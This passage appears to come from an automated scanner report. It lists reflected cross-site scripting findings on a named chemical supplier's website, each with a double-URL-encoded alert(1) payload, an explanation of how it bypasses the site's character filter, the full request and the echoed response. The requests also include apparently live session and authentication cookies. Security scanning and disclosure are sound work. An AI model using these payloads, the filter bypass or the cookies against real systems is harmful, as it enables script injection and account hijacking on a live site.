HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:40 GMT
Content-Length: 28992
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/services/product-process-develop82f46";alert(1)//7070efac145","E404") ;
   </script>
...[SNIP]...

1.204. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/regulatory-compliance [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/regulatory-compliance

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4fae%2522%253balert%25281%2529%252f%252f2dcc0c75c34 was submitted in the REST URL parameter 1. This input was echoed as c4fae";alert(1)//2dcc0c75c34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contentc4fae%2522%253balert%25281%2529%252f%252f2dcc0c75c34/sigma-aldrich/customer-support/customer-service/services/regulatory-compliance HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:32 GMT
Content-Length: 28990
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contentc4fae";alert(1)//2dcc0c75c34/sigma-aldrich/customer-support/customer-service/services/regulatory-compliance","E404") ;
   </script>
...[SNIP]...

1.205. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/regulatory-compliance [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/regulatory-compliance

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1de47%2522%253balert%25281%2529%252f%252f7682fdc4efd was submitted in the REST URL parameter 2. This input was echoed as 1de47";alert(1)//7682fdc4efd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich1de47%2522%253balert%25281%2529%252f%252f7682fdc4efd/customer-support/customer-service/services/regulatory-compliance HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:34 GMT
Content-Length: 28990
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich1de47";alert(1)//7682fdc4efd/customer-support/customer-service/services/regulatory-compliance","E404") ;
   </script>
...[SNIP]...

1.206. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/regulatory-compliance [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/regulatory-compliance

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 754e9%2522%253balert%25281%2529%252f%252f12a70f23f98 was submitted in the REST URL parameter 3. This input was echoed as 754e9";alert(1)//12a70f23f98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support754e9%2522%253balert%25281%2529%252f%252f12a70f23f98/customer-service/services/regulatory-compliance HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:37 GMT
Content-Length: 28990
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support754e9";alert(1)//12a70f23f98/customer-service/services/regulatory-compliance","E404") ;
   </script>
...[SNIP]...

1.207. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/regulatory-compliance [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/regulatory-compliance

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9bf6d%2522%253balert%25281%2529%252f%252f0b69c6e9943 was submitted in the REST URL parameter 4. This input was echoed as 9bf6d";alert(1)//0b69c6e9943 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service9bf6d%2522%253balert%25281%2529%252f%252f0b69c6e9943/services/regulatory-compliance HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:38 GMT
Content-Length: 28990
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service9bf6d";alert(1)//0b69c6e9943/services/regulatory-compliance","E404") ;
   </script>
...[SNIP]...

1.208. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/regulatory-compliance [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/regulatory-compliance

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 532c1%2522%253balert%25281%2529%252f%252f7d48ae8fdcf was submitted in the REST URL parameter 5. This input was echoed as 532c1";alert(1)//7d48ae8fdcf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/services532c1%2522%253balert%25281%2529%252f%252f7d48ae8fdcf/regulatory-compliance HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:40 GMT
Content-Length: 28990
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
